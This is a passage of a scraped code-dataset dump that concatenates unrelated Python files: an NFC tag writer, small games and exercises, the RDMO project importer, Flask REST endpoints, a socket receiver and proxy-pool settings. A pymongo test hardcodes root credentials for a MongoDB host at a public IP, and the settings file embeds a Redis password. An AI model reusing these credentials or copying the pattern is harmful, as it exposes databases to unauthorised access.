prmsDef['lw_block']\n\t\tif True:\n\t\t\tif prms['ofsuffix']=='':\n\t\t\t\tprms['ofsuffix']='{}'.format(ofindex)\n\t\t\tdrawStack(ifname,stack,cols,prms)\n","sub_path":"stackVisualizer.py","file_name":"stackVisualizer.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"62593129","text":"#! /usr/bin/python\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom pprint import pprint\nimport argparse\nimport logging\nimport sys\n\nimport nfc_comm\nimport packet\n\n\ndef main():\n logging.basicConfig(level=logging.DEBUG)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--version', default=2, nargs='?', type=int)\n options = parser.parse_args()\n\n nfc = nfc_comm.NFC()\n readers = nfc.get_readers()\n if len(readers) == 0:\n print('Cannot find NFC reader.')\n return 2\n\n reader_status = nfc_comm.ReaderStatus(nfc.get_status_change()[0])\n if not reader_status.is_card_present():\n print('No card present.')\n return 2\n\n print('Found card.')\n\n cards = nfc_comm.get_cards(nfc)\n if len(cards) == 0:\n print('Card is not NTAG203.')\n return 2\n\n print('Card is NTAG203.')\n card = cards[0]\n\n with nfc_comm.Connection(nfc) as conn:\n if options.version == 1:\n defaults = packet.v1_defaults()\n else:\n defaults = packet.v2_defaults(1)\n pprint(defaults)\n card.write(conn, packet.encode(defaults))\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"dll/format_tag.py","file_name":"format_tag.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"390194232","text":"import random\nground1 = input(\"화면의 크기와 플레이어의 좌표(x,y)를 입력해주세요:\")\nground = ground1.split(\",\")\nbackground = int(ground[0])\n\ndef daramG_location():\n num = 0\n daramG_x = random.randrange(0,background)\n daramG_y = random.randrange(0,background)\n print(\"다람쥐 좌표 (%d,%d)\"%(daramG_x,daramG_y))\n return (daramG_x,daramG_y)\n\nplayer_x = int(ground[1])\nplayer_y = int(ground[2])\nprint(\"플레이어 좌표(%d,%d)\"%(player_x,player_y))\nplayer = [player_x,player_y]\n\ndef star_location(background,double,player):\n if(5 <= background and background <= 20):\n for i in range(0,background):\n for j in range(0,background):\n if (j,i) == double[0]:\n print(\"D\",end=\" \")\n elif (j,i) == double[1]:\n print(\"D\",end=\" \")\n elif j == player_x and i == player_y:\n print(\"C\",end=\" \")\n else:\n print(\"*\",end=\" \")\n print(\"\\n\")\n\nwhile(1):\n double = [daramG_location(),daramG_location()]\n if double[0] == player or double[1] == player:\n continue\n else:\n break\n\nstar_location(background,double,player)","sub_path":"python_directory/pratice07/DaramG.py","file_name":"DaramG.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619099607","text":"import base64\nimport io\nimport logging\nimport mimetypes\nfrom urllib.parse import urlparse, quote\n\nimport requests\n\nfrom django import forms\nfrom django.core.files import File\nfrom django.core.exceptions import ValidationError\nfrom django.shortcuts import redirect, render\nfrom django.utils.translation import gettext_lazy as _\n\nfrom rdmo.core.plugins import Plugin\nfrom rdmo.core.imports import handle_fetched_file\nfrom rdmo.core.xml import get_ns_map, get_uri, read_xml_file\nfrom rdmo.domain.models import Attribute\nfrom rdmo.options.models import Option\nfrom rdmo.questions.models import Catalog\nfrom rdmo.services.providers import GitHubProviderMixin, GitLabProviderMixin\nfrom rdmo.tasks.models import Task\nfrom rdmo.views.models import View\nfrom .models import Project, Snapshot, Value\n\nlog = logging.getLogger(__name__)\n\n\nclass Import(Plugin):\n\n upload = True\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.file_name = None\n self.source_title = None\n self.current_project = None\n self.project = None\n self.catalog = None\n\n self._attributes = {attribute.uri: attribute for attribute in Attribute.objects.all()}\n self._options = {option.uri: option for option in Option.objects.all()}\n self._tasks = {task.uri: task for task in Task.objects.all()}\n self._views = {view.uri: view for view in View.objects.all()}\n\n self.values = []\n self.snapshots = []\n self.tasks = []\n self.views = []\n\n def render(self):\n raise NotImplementedError\n\n def submit(self):\n raise NotImplementedError\n\n def check(self):\n raise NotImplementedError\n\n def process(self):\n raise NotImplementedError\n\n def get_attribute(self, attribute_uri):\n try:\n return self._attributes.get(attribute_uri)\n except KeyError:\n log.info('Attribute %s not in db. Skipping.', attribute_uri)\n\n def get_option(self, option_uri):\n try:\n return self._options.get(option_uri)\n except KeyError:\n log.info('Option %s not in db. Skipping.', option_uri)\n\n def get_task(self, tasks_uri):\n try:\n return self._tasks.get(tasks_uri)\n except KeyError:\n log.info('Task %s not in db. Skipping.', tasks_uri)\n\n def get_view(self, view_uri):\n try:\n return self._views.get(view_uri)\n except KeyError:\n log.info('View %s not in db. Skipping.', view_uri)\n\n\nclass RDMOXMLImport(Import):\n\n def check(self):\n file_type, encoding = mimetypes.guess_type(self.file_name)\n if file_type == 'application/xml' or file_type == 'text/xml':\n self.root = read_xml_file(self.file_name)\n if self.root and self.root.tag == 'project':\n self.ns_map = get_ns_map(self.root)\n return True\n\n def process(self):\n if self.current_project is None:\n catalog_uri = get_uri(self.root.find('catalog'), self.ns_map)\n try:\n self.catalog = Catalog.objects.all().get(uri=catalog_uri)\n except Catalog.DoesNotExist:\n log.info('Catalog not in db. Created with uri %s', catalog_uri)\n self.catalog = Catalog.objects.all().first()\n\n self.project = Project()\n self.project.title = self.root.find('title').text or ''\n self.project.description = self.root.find('description').text or ''\n self.project.created = self.root.find('created').text\n self.project.catalog = self.catalog\n else:\n self.catalog = self.current_project.catalog\n\n tasks_node = self.root.find('tasks')\n if tasks_node is not None:\n for task_node in tasks_node.findall('task'):\n task_uri = get_uri(task_node, self.ns_map)\n if task_uri:\n task = self.get_task(task_uri)\n if task:\n self.tasks.append(task)\n\n views_node = self.root.find('views')\n if views_node is not None:\n for view_node in views_node.findall('view'):\n view_uri = get_uri(view_node, self.ns_map)\n if view_uri:\n view = self.get_view(view_uri)\n if view:\n self.views.append(view)\n\n values_node = self.root.find('values')\n if values_node is not None:\n for value_node in values_node.findall('value'):\n self.values.append(self.get_value(value_node))\n\n snapshots_node = self.root.find('snapshots')\n if snapshots_node is not None:\n for snapshot_index, snapshot_node in enumerate(snapshots_node.findall('snapshot')):\n if snapshot_node is not None:\n snapshot = Snapshot()\n snapshot.title = snapshot_node.find('title').text or ''\n snapshot.description = snapshot_node.find('description').text or ''\n snapshot.created = snapshot_node.find('created').text\n\n snapshot_values = []\n snapshot_values_node = snapshot_node.find('values')\n if snapshot_values_node is not None:\n for snapshot_value_node in snapshot_values_node.findall('value'):\n snapshot_values.append(self.get_value(snapshot_value_node))\n\n snapshot.snapshot_index = snapshot_index\n snapshot.snapshot_values = snapshot_values\n\n self.snapshots.append(snapshot)\n\n def get_value(self, value_node):\n value = Value()\n\n attribute_uri = get_uri(value_node.find('attribute'), self.ns_map)\n if attribute_uri is not None:\n value.attribute = self.get_attribute(attribute_uri)\n\n try:\n value.set_prefix = value_node.find('set_prefix').text or ''\n except AttributeError:\n value.set_prefix = ''\n\n value.set_index = int(value_node.find('set_index').text)\n value.collection_index = int(value_node.find('collection_index').text)\n\n value.text = value_node.find('text').text or ''\n\n option_uri = get_uri(value_node.find('option'), self.ns_map)\n if option_uri:\n value.option = self.get_option(option_uri)\n\n value.file_import = None\n file_node = value_node.find('file')\n if file_node is not None:\n file_string = file_node.text\n if file_string is not None:\n value.file_import = {\n 'name': file_node.attrib.get('name', 'file.dat'),\n 'file': File(io.BytesIO(base64.b64decode(file_string)))\n }\n\n value_type_node = value_node.find('value_type')\n if value_type_node is not None:\n value.value_type = value_type_node.text or ''\n\n unit_node = value_node.find('unit')\n if unit_node is not None:\n value.unit = unit_node.text or ''\n\n external_id_node = value_node.find('external_id')\n if external_id_node is not None:\n value.external_id = external_id_node.text or ''\n\n value.created = value_node.find('created').text\n value.updated = value_node.find('updated').text\n\n return value\n\n\nclass URLImport(RDMOXMLImport):\n\n upload = False\n\n class Form(forms.Form):\n url = forms.URLField(label=_('Import project from this URL'), required=True)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.provider = RDMOXMLImport(*args, **kwargs)\n\n def render(self):\n form = self.Form()\n return render(self.request, 'projects/project_import_form.html', {\n 'source_title': 'URL',\n 'form': form\n }, status=200)\n\n def submit(self):\n form = self.Form(self.request.POST)\n\n if 'cancel' in self.request.POST:\n if self.project is None:\n return redirect('projects')\n else:\n return redirect('project', self.project.id)\n\n if form.is_valid():\n self.source_title = form.cleaned_data['url']\n\n response = requests.get(form.cleaned_data['url'])\n self.request.session['import_file_name'] = handle_fetched_file(response.content)\n\n if self.current_project:\n return redirect('project_update_import', self.current_project.id)\n else:\n return redirect('project_create_import')\n\n return render(self.request, 'projects/project_import_form.html', {\n 'source_title': 'URL',\n 'form': form\n }, status=200)\n\n\nclass GitHubImport(GitHubProviderMixin, RDMOXMLImport):\n\n upload = False\n\n class Form(forms.Form):\n repo = forms.CharField(label=_('GitHub repository'),\n help_text=_('Please use the form username/repository or organization/repository.'))\n path = forms.CharField(label=_('File path'))\n ref = forms.CharField(label=_('Branch, tag, or commit'), initial='master')\n\n def render(self):\n return render(self.request, 'projects/project_import_form.html', {\n 'source_title': 'GitHub',\n 'form': self.Form()\n }, status=200)\n\n def submit(self):\n form = self.Form(self.request.POST)\n\n if 'cancel' in self.request.POST:\n if self.project is None:\n return redirect('projects')\n else:\n return redirect('project', self.project.id)\n\n if form.is_valid():\n self.request.session['import_source_title'] = self.source_title = form.cleaned_data['path']\n\n url = '{api_url}/repos/{repo}/contents/{path}?ref={ref}'.format(\n api_url=self.api_url,\n repo=quote(form.cleaned_data['repo']),\n path=quote(form.cleaned_data['path']),\n ref=quote(form.cleaned_data['ref'])\n )\n\n return self.get(self.request, url)\n\n return render(self.request, 'projects/project_import_form.html', {\n 'source_title': 'GitHub',\n 'form': form\n }, status=200)\n\n def get_success(self, request, response):\n file_content = response.json().get('content')\n request.session['import_file_name'] = handle_fetched_file(base64.b64decode(file_content))\n\n if self.current_project:\n return redirect('project_update_import', self.current_project.id)\n else:\n return redirect('project_create_import')\n\n\nclass GitLabImport(GitLabProviderMixin, RDMOXMLImport):\n\n upload = False\n\n class Form(forms.Form):\n repo = forms.CharField(label=_('GitLab repository'),\n help_text=_('Please use the form username/repository or organization/repository.'))\n path = forms.CharField(label=_('File path'),)\n ref = forms.CharField(label=_('Branch, tag, or commit'), initial='master')\n\n def render(self):\n return render(self.request, 'projects/project_import_form.html', {\n 'source_title': self.gitlab_url,\n 'form': self.Form()\n }, status=200)\n\n def submit(self):\n form = self.Form(self.request.POST)\n\n if 'cancel' in self.request.POST:\n if self.project is None:\n return redirect('projects')\n else:\n return redirect('project', self.project.id)\n\n if form.is_valid():\n self.request.session['import_source_title'] = form.cleaned_data['path']\n\n url = '{api_url}/projects/{repo}/repository/files/{path}?ref={ref}'.format(\n api_url=self.api_url,\n repo=quote(form.cleaned_data['repo'], safe=''),\n path=quote(form.cleaned_data['path'], safe=''),\n ref=quote(form.cleaned_data['ref'], safe='')\n )\n\n return self.get(self.request, url)\n\n return render(self.request, 'projects/project_import_form.html', {\n 'source_title': self.gitlab_url,\n 'form': form\n }, status=200)\n\n def get_success(self, request, response):\n file_content = response.json().get('content')\n request.session['import_file_name'] = handle_fetched_file(base64.b64decode(file_content))\n\n if self.current_project:\n return redirect('project_update_import', self.current_project.id)\n else:\n return redirect('project_create_import')\n","sub_path":"rdmo/projects/imports.py","file_name":"imports.py","file_ext":"py","file_size_in_byte":12552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"143344575","text":"from flask_restful import reqparse, abort, Resource, fields, marshal_with\nfrom sqlalchemy import func, inspect, desc\n\nimport json\n\nfrom models import Visita\nfrom models import Evento\n\nfrom db import session\n\ndef object_as_eventos(obj):\n return {c.key: getattr(obj, c.key)\n for c in inspect(obj).mapper.column_attrs}\n\nvisita_fields = {\n 'id': fields.Integer,\n 'title': fields.String,\n 'address': fields.String,\n 'visit_token': fields.String,\n 'visitor_token': fields.String,\n 'user_id': fields.Integer,\n 'ip': fields.String,\n 'user_agent': fields.String,\n 'referrer': fields.String,\n 'referring_domain': fields.String,\n 'landing_page': fields.String,\n 'bEventoser': fields.String,\n 'os': fields.String,\n 'device_type': fields.String,\n 'country': fields.String,\n 'region': fields.String,\n 'city': fields.String,\n 'latitude': fields.Float,\n 'longitude': fields.Float,\n 'utm_source': fields.String,\n 'utm_medium': fields.String,\n 'utm_term': fields.String,\n 'utm_content': fields.String,\n 'utm_campaign': fields.String,\n 'app_version': fields.String,\n 'os_version': fields.String,\n 'platform': fields.String,\n 'started_at': fields.String\n}\n\n\nevento_fields = {\n 'id': fields.Integer,\n 'name': fields.String,\n 'time': fields.DateTime,\n 'properties': fields.Raw,\n 'visita': fields.Nested(visita_fields)\n}\n\neventos_fields = {\n 'id': fields.Integer,\n 'name': fields.String,\n 'time': fields.DateTime,\n 'properties': fields.Raw,\n 'visita': fields.Nested(visita_fields)\n}\n\nnum_eventos_fields = {\n 'visit_id': fields.Integer,\n 'cuentavisitas': fields.Integer,\n}\n\n\nclass Home(Resource):\n def get(self):\n return 'Flask', 200\n\n\nclass Get_Visita(Resource):\n @marshal_with(visita_fields)\n def get(self, visita_id):\n visita = session.query(Visita).filter(Visita.id == visita_id).first()\n if not visita:\n abort(404, message=\"La visita {} no existe\".format(visita_id))\n return visita\n\nclass Get_Eventos_por_VisitaList(Resource):\n @marshal_with(eventos_fields)\n def get(self, visitor_token):\n eventos = session.query(Visita).outerjoin(Evento).filter(Visita.visitor_token == visitor_token).order_by(Evento.time.desc()).all()\n if not eventos:\n abort(404, message=\"La visita con token {} no existe\".format(visitor_token))\n return eventos\n\nclass Get_Evento(Resource):\n @marshal_with(evento_fields)\n def get(self, evento_id):\n evento = session.query(Evento).outerjoin(Visita).filter(Evento.id == evento_id).first()\n if not evento:\n abort(404, message=\"El evento {} no existe\".format(evento_id))\n return evento\n\nclass Get_VisitaList(Resource):\n @marshal_with(visita_fields)\n def get(self):\n visitas = session.query(Visita).all()\n return visitas\n\nclass Get_Visita_por_TokenList(Resource):\n @marshal_with(visita_fields)\n def get(self, visitor_token):\n visitas = session.query(Visita).filter(Visita.visitor_token == visitor_token).order_by(Visita.started_at.desc()).all()\n if not visitas:\n abort(404, message=\"Las visitas con token {} no existen \".format(visitor_token))\n return visitas\n\nclass Get_EventoList(Resource):\n @marshal_with(evento_fields)\n def get(self):\n eventos = session.query(Evento).outerjoin(Visita).order_by(Evento.time.desc()).all()\n return eventos\n\n\n\nclass Get_Numero_Eventos_por_VisitaList(Resource):\n @marshal_with(num_eventos_fields)\n def get(self):\n num_eventos = session.query(Evento.visit_id, func.count(Evento.visit_id).label(\"cuentavisitas\")).group_by(Evento.visit_id).order_by(desc(\"cuentavisitas\"))\n array = []\n for e in num_eventos:\n v = {}\n v['visit_id'] = e[0]\n v['cuentavisitas'] = e[1]\n array.append(v)\n return(array)\n","sub_path":"resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"206851520","text":"import reshade as rs\n\n\nclass TestReLUActivationLayer:\n def test_ReLUActivationLayer(self):\n inputs = rs.ConnectionLayer(depth=1, height=2, width=2)\n outputs = rs.ConnectionLayer(depth=1, height=2, width=2)\n\n rs.activation.ReLUActivationLayer(inputs, outputs)\n\n assert inputs.values == [\n [[0, 0],\n [0, 0]]\n ]\n assert outputs.values == [\n [[0, 0],\n [0, 0]]\n ]\n\n inputs.values = [\n [[-1, -2],\n [1, 2]]\n ]\n assert outputs.values == [\n [[0, 0],\n [1, 2]]\n ]\n","sub_path":"tests/activation/test_ReLUActivationLayer.py","file_name":"test_ReLUActivationLayer.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641985114","text":"#!/usr/bin/python3\n'''Building Shadowrun 5 rules into python'''\nimport random\nimport json\nfrom collections import Counter\nimport character\n\ndef calculate_hits(dice_pool, limit):\n '''\n calculate the number of 'hits' when rolling a specified dicepool\n dice_pool can be int, or something sum()-able\n '''\n if not isinstance(dice_pool, int):\n dice_pool = sum(dice_pool)\n results = Counter(\n [random.randint(1, 6) for _ in range(dice_pool)]\n )\n hits, glitch = results[6]+results[5], 0\n if hits > limit:\n hits = limit\n if results[1] >= (dice_pool/2):\n glitch = 1\n if not hits:\n glitch = 2\n return (hits, glitch)\n\n\ndef calculate_combat(attacker, defender):\n '''\n calculate the results of combat\n '''\n #initalize the results output-dictionary\n faux_limit = 4\n results = {}\n\n #PHASE 1 roll initial attack\n first_hits = {\n 'attacker':calculate_hits(attacker.skill + attacker.attribute, faux_limit),\n 'defender':calculate_hits(defender.intuition + defender.reaction, faux_limit)\n }\n first_net = first_hits['attacker'][0] - first_hits['defender'][0]\n\n #PHASE 2 determine damage type\n damage_type = 'P'\n if (first_net + attacker.dv)\\\n < (defender.armor - attacker.ap):\n damage_type = 'S'\n\n #PHASE 3 body_resist\n body_resist = calculate_hits(defender.body + defender.armor - attacker.ap, faux_limit)\n\n #calculate damage, accounting for the body-resist\n results['damage'] = [first_net + attacker.dv - body_resist[0], damage_type]\n\n #null the damage if the value is < 0\n if results['damage'][0] < 0:\n results['damage'][0] = 0\n\n #build the glitch output, just in case\n results['glitch'] = {\n 'attack':first_hits['attacker'][1],\n 'defense':first_hits['defender'][1],\n 'resist':body_resist[1]\n }\n\n if first_net < 1:\n results['damage'][0] = 0\n #finalize the damage value as a tuple (easier to use for calculations)\n results['damage'] = tuple(results['damage'])\n\n #the thing, has been done\n return results\n\nJOHN = character.Character(skill=6, attribute=5, ap=2, dv=2)\nSIEN = character.Character(skill=3, attribute=2, ap=0, dv=7)\nMOOK = character.Character(intuition=3, reaction=4, body=4, armor=12)\n\nprint(\n Counter(\n [\n tuple(\n calculate_combat(defender=MOOK, attacker=SIEN)['damage']\n )\n for _ in range(100)\n ]\n )\n)\n","sub_path":"sr5.py","file_name":"sr5.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"487604928","text":"from learn_basics.trees.Traversal import Traversal\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass SortedArrayToTree:\n def sortedArrayToBST(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n if not nums:\n return None\n return self.build_tree_sorted_list(nums, 0, len(nums) - 1, None)\n\n def build_tree_sorted_list(self, inp, start, end, node):\n if end - start >= 0:\n mid = (start + end) // 2\n node = TreeNode(inp[mid])\n node.left = self.build_tree_sorted_list(inp, start, mid - 1, node)\n node.right = self.build_tree_sorted_list(inp, mid + 1, end, node)\n return node\n else:\n return None\n\n\nsatt = SortedArrayToTree()\nresult = satt.sortedArrayToBST([1, 2, 3, 4, 5, 6, 7])\ntr = Traversal()\ntr.levelorder(result)\n","sub_path":"leet/SortedArrayToTree.py","file_name":"SortedArrayToTree.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"622974671","text":"import sys\nfrom jnius import autoclass\n\ndef testUnitizing():\n UAS = autoclass('org.dkpro.statistics.agreement.unitizing.UnitizingAnnotationStudy')\n # raterCount, length\n study = UAS(2, 20)\n # offset, length, rater, category\n study.addUnit(4,2,1, \"a\")\n study.addUnit(4,2,2, \"a\")\n study.addUnit(10,3,1, \"B\")\n study.addUnit(0,3,2, \"B\")\n KAUA = autoclass('org.dkpro.statistics.agreement.unitizing.KrippendorffAlphaUnitizingAgreement')\n alpha = KAUA(study)\n print(alpha.calculateCategoryAgreement(\"a\"))\n print(alpha.calculateCategoryAgreement(\"B\"))\n UMP = autoclass('org.dkpro.statistics.agreement.visualization.UnitizingMatrixPrinter')\n USP = autoclass('org.dkpro.statistics.agreement.visualization.UnitizingStudyPrinter')\n ump = UMP()\n System = autoclass('java.lang.System')\n ump.print(System.out, study, \"a\", 2, 1)\n ump.print(System.out, study, \"B\", 2, 1)\n USP().print(System.out, study)\n USP().printUnitsForCategory(System.out, study, \"a\", \"a\")\n USP().printUnitsForCategory(System.out, study, \"B\", \"B\")\n\nif __name__ == \"__main__\":\n testUnitizing()\n","sub_path":"testUnitizing.py","file_name":"testUnitizing.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"153599857","text":"# This is a test file to show the successful transfer of multiple data types and array formats\r\n# Run simultaneously with baseStation_test.py on the Pi\r\n# \r\n# To use, enter the computer's IPv4 address as an argument when running the file\r\n# If no argument is entered, it will ask you for the IPv4 address before running anyways.\r\n\r\nimport socket\r\nimport struct\r\nimport sys\r\nfrom numpy import array\r\nfrom baseTalk import *\r\n\r\n\r\ndef waitForData():\r\n# try:\r\n while True:\r\n# try:\r\n \r\n data = conn.recv(1024)\r\n conn.sendall(b\"Received.\")\r\n \r\n if not data: break\r\n \r\n formatString = processFmt( conn, data)\r\n recieve = split2packets(formatString)\r\n \r\n \r\n \r\n while True:\r\n data = conn.recv(1024)\r\n conn.sendall(b\"Received.\")\r\n if data: break\r\n \r\n content = processData( conn, recieve, data)\r\n \r\n print(\"Recieved: \\n\", content)\r\n \r\n \r\n# except:\r\n# conn.sendall(b\"ERROR\")\r\n# print(\"Socket Error Occurred\")\r\n# break\r\n# \r\n# except KeyboardInterrupt:\r\n# conn.close()\r\n# sys.exit('Connection has been closed by user.')\r\n\r\n\r\n\r\n\r\n# Start of the main program\t\r\n\r\nif (len(sys.argv) == 2):\r\n host = sys.argv[1]\r\nelse:\r\n print('Note: You can enter the client IP address as an argument after the funciton name\\nNext time, enter \\\"python3 recieveData.py \\\"')\r\n host = input('\\nEnter the client IP address: ')\r\n\r\nport = 12345\r\n\r\nif (len(host) == 2):\r\n host = strcat('192.168.', host, '.1')\r\n\r\nprint('Attempting to connect using ', host)\r\ntry:\r\n socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n socket.bind((host, port))\r\nexcept:\r\n sys.exit('Client IP Address was not valid. Check that the correct IP address was entered')\r\n\r\ntry:\r\n print('Waiting for connection from host')\r\n socket.listen(1)\r\n conn, addr = socket.accept()\r\nexcept:\r\n print('Conneciton request timed out.')\r\n\r\nprint('Connected by ', addr[0])\r\nprint('Press [ctrl + C] on Pi to stop\\n')\r\n\r\n#try:\r\nwaitForData()\r\n#except:\r\n# sys.exit(\"Connection Closed.\")\r\n","sub_path":"WifiTransfer/Computer Files/homeBase.py","file_name":"homeBase.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"248584404","text":"from pymongo import MongoClient\nclient = MongoClient('112.124.68.222', 27017)\ndb = client.test123\ndb.auth('root', '123456')\n\npost = {\n \"author\": \"Mike\",\n \"text\": \"My first blog post!\",\n \"tags\": [\"mongodb\", \"python\", \"pymongo\"],\n \"date\": \"2012-12-12\"\n}\nposts = db.posts\npost_id = posts.insert(post)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"450411393","text":"# Universidade Federal de Campina Grande - UFCG\n# Programação - 1\n# Guilherme Aureliano\n# Tweets\n\ntweets = int(input())\npaginas = tweets // 400\n\nprint('Serão necessárias {} página(s) para visualizar os tweets.'.format(paginas))\n\nif tweets >= 400:\n perdidos = tweets - (400 * paginas)\n print('{:.1f}% dos tweets serão perdidos.'.format((perdidos * 100)/tweets))\nelse:\n perdidos = 100\n print('{:.1f}% dos tweets serão perdidos.'.format(perdidos))\n\n\n\n\n\n","sub_path":"unidade1-2/tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"211964532","text":"import codecs\nimport os\n\ntry:\n from setuptools import setup\nexcept:\n from distutils.core import setup\n\n\ndef read(fname):\n return codecs.open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nlong_des = read(\"README.rst\")\n\nplatforms = ['linux/Windows']\nclassifiers = [\n 'Development Status :: 3 - Alpha',\n 'Topic :: Text Processing',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n]\n\n\nsetup(name='content_insights_statsd',\n version='0.13.0',\n description='A test module for statsd in airflow operator',\n long_description=long_des,\n py_modules=['content_insights_statsd.bash_operator','content_insights_statsd.python_operator','content_insights_statsd.prom_statsd'],\n author=\"myang\",\n author_email=\"407768752@qq.com\",\n license=\"Apache License, Version 2.0\",\n platforms=platforms,\n classifiers=classifiers\n )\n","sub_path":"pypi_install_script/content_insights_statsd-0.13.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"350230175","text":"\"\"\"\nSettings for global.\n\"\"\"\n#####################################################################\n# Scrapy settings of this project\n#####################################################################\n# scrapy basic info\nBOT_NAME = 'haiproxy'\nSPIDER_MODULES = ['crawler.spiders', 'crawler.validators']\nNEWSPIDER_MODULE = 'crawler'\n\n# downloader settings\nROBOTSTXT_OBEY = False\nCOOKIES_ENABLED = False\nDOWNLOAD_TIMEOUT = 30\n# to aviod infinite recursion\nDEPTH_LIMIT = 100\nCONCURRENT_REQUESTS = 50\n# don't filter anything, also can set dont_filter=True in Request objects\nDUPEFILTER_CLASS = 'scrapy.dupefilters.BaseDupeFilter'\nHTTPCACHE_ENABLED = False\nGFW_PROXY = 'http://127.0.0.1:8123'\n\n# splash settings.If you use docker-compose,SPLASH_URL = 'http://splash:8050'\nSPLASH_URL = 'http://127.0.0.1:8050'\n\n# extension settings\nRETRY_ENABLED = False\nTELNETCONSOLE_ENABLED = False\n\n\nDOWNLOADER_MIDDLEWARES = {\n 'crawler.middlewares.UserAgentMiddleware': 543,\n 'crawler.middlewares.ProxyMiddleware': 543,\n 'scrapy_splash.SplashCookiesMiddleware': 723,\n # it should be before than HttpProxyMiddleware\n 'scrapy_splash.SplashMiddleware': 725,\n 'scrapy.downloadermiddlewares.httpcompression.HttpCompressionMiddleware': 810,\n}\n\nSPIDER_MIDDLEWARES = {\n 'scrapy_splash.SplashDeduplicateArgsMiddleware': 100,\n}\n\n# scrapy log settings\nLOG_LEVEL = 'DEBUG'\nLOG_FILE = 'logs/haipproxy.log'\n\n\n#####################################################################\n# Custom settings of this project\n#####################################################################\n# redis settings.If you use docker-compose, REDIS_HOST = 'redis'\nREDIS_HOST = '127.0.0.1'\nREDIS_PORT = 6379\nREDIS_PASSWORD = 'womendei'\nDEFAULT_REDIS_DB = 0\nMETA_DATA_DB = 0\n\n# scheduler settings\nTIMER_RECORDER = 'haipproxy:schduler:task'\nLOCKER_PREFIX = 'haipproxy:lock:'\n\n# proxies crawler's settings\nSPIDER_FEED_SIZE = 10\nSPIDER_COMMON_TASK = 'haipproxy:spider:common'\nSPIDER_AJAX_TASK = 'haipproxy:spider:ajax'\nSPIDER_GFW_TASK = 'haipproxy:spider:gfw'\nSPIDER_AJAX_GFW_TASK = 'haipproxy:spider:ajax_gfw'\n\n# data_all is a set , it's a dupefilter\nDATA_ALL = 'haipproxy:all'\n# the data flow is init queue->validated_queue->validator_queue(temp)->validated_queue(score queue)->\n# ttl_queue, speed_qeuue -> clients\n# http_queue is a list, it's used to store initially http/https proxy resourecs\nINIT_HTTP_QUEUE = 'haipproxy:init:http'\n# socks proxy resources container\nINIT_SOCKS4_QUEUE = 'haipproxy:init:socks4'\nINIT_SOCKS5_QUEUE = 'haipproxy:init:socks5'\n\n# custom validator settings\nVALIDATOR_FEED_SIZE = 50\n\n# they are temp sets, come from init queue, in order to filter transparnt ip\nTEMP_HTTP_QUEUE = 'haipproxy:http:temp'\nTEMP_HTTPS_QUEUE = 'haipproxy:https:temp'\nTEMP_WEIBO_QUEUE = 'haipproxy:weibo:temp'\nTEMP_ZHIHU_QUEUE = 'haipproxy:zhihu:temp'\nTEMP_PHISHTANK_QUEUE = 'haipproxy:phishtank:temp'\n\n# valited queues are zsets.squid and other clients fetch ip resources from them.\nVALIDATED_HTTP_QUEUE = 'haipproxy:validated:http'\nVALIDATED_HTTPS_QUEUE = 'haipproxy:validated:https'\nVALIDATED_WEIBO_QUEUE = 'haipproxy:validated:weibo'\nVALIDATED_ZHIHU_QUEUE = 'haipproxy:validated:zhihu'\nVALIDATED_PHISHTANK_QUEUE = 'haipproxy:validated:phishtank'\n\n# time to life of proxy ip resources\nTTL_VALIDATED_RESOURCE = 2 # minutes\nTTL_HTTP_QUEUE = 'haipproxy:ttl:http'\nTTL_HTTPS_QUEUE = 'haipproxy:ttl:https'\nTTL_WEIBO_QUEUE = 'haipproxy:ttl:weibo'\nTTL_ZHIHU_QUEUE = 'haipproxy:ttl:zhihu'\nTTL_PHISHTANK_QUEUE = 'haipproxy:ttl:phishtank'\n\n# queue for proxy speed\nSPEED_HTTP_QUEUE = 'haipproxy:speed:http'\nSPEED_HTTPS_QUEUE = 'haipproxy:speed:https'\nSPEED_WEIBO_QUEUE = 